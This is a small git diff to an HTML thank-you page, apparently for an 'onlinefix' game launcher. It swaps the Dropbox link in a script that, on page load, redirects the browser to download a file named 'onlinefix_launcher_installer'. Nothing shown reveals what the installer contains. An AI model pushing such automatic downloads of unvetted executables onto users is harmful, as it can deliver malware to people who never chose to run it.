--- a/pages/ofmeThanks.html
+++ b/pages/ofmeThanks.html
@@ -90,7 +90,7 @@
         </div>
     </div>
     <script>
-        window.location.href = "https://www.dropbox.com/scl/fi/ktvxtkdlljjwj2i3n85m0/onlinefix_launcher_installer?rlkey=xeck981v9vsrcmbtymsbv3ajm&st=4q5kxx26&dl=1";
+        window.location.href = "https://www.dropbox.com/scl/fi/9z0oed8mhzki37s3rgnqf/onlinefix_launcher_installer?rlkey=xvlvavsmxlfs8sav7a2rvvfrm&st=zaxq990r&dl=1";
     </script>
 </body>
 </html>
